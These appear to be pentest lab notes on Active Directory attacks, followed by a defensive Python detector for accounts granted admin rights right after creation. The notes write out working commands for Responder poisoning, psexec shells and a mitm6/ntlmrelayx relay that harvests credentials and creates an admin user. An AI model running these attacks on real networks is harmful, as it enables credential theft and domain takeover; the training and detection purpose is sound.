Attack Vectors
The following method requires user interaction (for example, from an RDP session):
- 1. Run responder.py to listen for activity.
- 2. Obtain hashes and crack them.
- 3. Gain a shell via psexec.py.
- Syntax -> psexec.py DOMAIN.local/username:PASSWORD@IP_ADDRESS

- 1. Download mitm6 and install it with pip3.
- 2. Set up LDAPS on the Windows server.
- Server -> Manage -> Add Roles and Features -> add Active Directory certificates -> configure ADCS (restart option enabled) -> click CA -> restart the machine
- 3. python3 mitm6.py -d marvel.local (in the opt folder) -> this starts listening for connections
- 4. ntlmrelayx.py -6 -t ldaps://DOMAINCONTROLLER_IP -wh fakewpad.marvel.local -l lootme
- 5. A user restarts a computer -> all the creds will be stored in a folder called "lootme"


If you look at it in Firefox, you can see all kinds of secrets!

Once a user logs in as admin, it creates a new user with admin privileges.
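
The last step leaves a trace defenders can look for: a new account that receives admin rights almost immediately after it is created. The following is an added example, not part of the original notes, that flags this pattern in Windows Security events; the event schema, the sample events and the privileged-group list are constructed assumptions.

```python
from datetime import datetime, timedelta

# Real Windows Security event IDs: 4720 = user account created;
# 4728 / 4732 / 4756 = member added to a security-enabled
# global / local / universal group.
CREATE = 4720
GROUP_ADD = {4728, 4732, 4756}
# Assumption: which groups count as privileged; adjust per environment.
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators"}


def find_fast_privileged_accounts(events, window=timedelta(seconds=60)):
    """Return (account, group, seconds) for every account that was created
    and then added to a privileged group within `window`."""
    created = {}  # lower-cased account name -> creation time
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == CREATE:
            created[ev["target"].lower()] = ev["time"]
        elif ev["id"] in GROUP_ADD and ev.get("group") in PRIVILEGED:
            t0 = created.get(ev["member"].lower())
            if t0 is not None and ev["time"] - t0 <= window:
                delta = (ev["time"] - t0).total_seconds()
                hits.append((ev["member"], ev["group"], delta))
    return hits


def _t(h, m, s):
    # Constructed timestamps, all on one arbitrary day.
    return datetime(2024, 1, 1, h, m, s)


# Constructed sample events in a simplified, hypothetical schema;
# real logs need their own field mapping onto these keys.
SAMPLE_EVENTS = [
    {"id": 4720, "time": _t(9, 0, 0), "target": "svc_backup"},
    {"id": 4728, "time": _t(9, 45, 0), "member": "svc_backup", "group": "Domain Admins"},
    {"id": 4720, "time": _t(10, 15, 2), "target": "xQpLmNrTzA"},
    {"id": 4756, "time": _t(10, 15, 3), "member": "xQpLmNrTzA", "group": "Enterprise Admins"},
    {"id": 4732, "time": _t(10, 20, 0), "member": "jsmith", "group": "Remote Desktop Users"},
]

if __name__ == "__main__":
    for account, group, secs in find_fast_privileged_accounts(SAMPLE_EVENTS):
        print(f"ALERT: {account} added to {group} {secs:.0f}s after creation")
```

The 60-second window is an arbitrary starting point; widen it to match how quickly legitimate provisioning assigns groups in your environment.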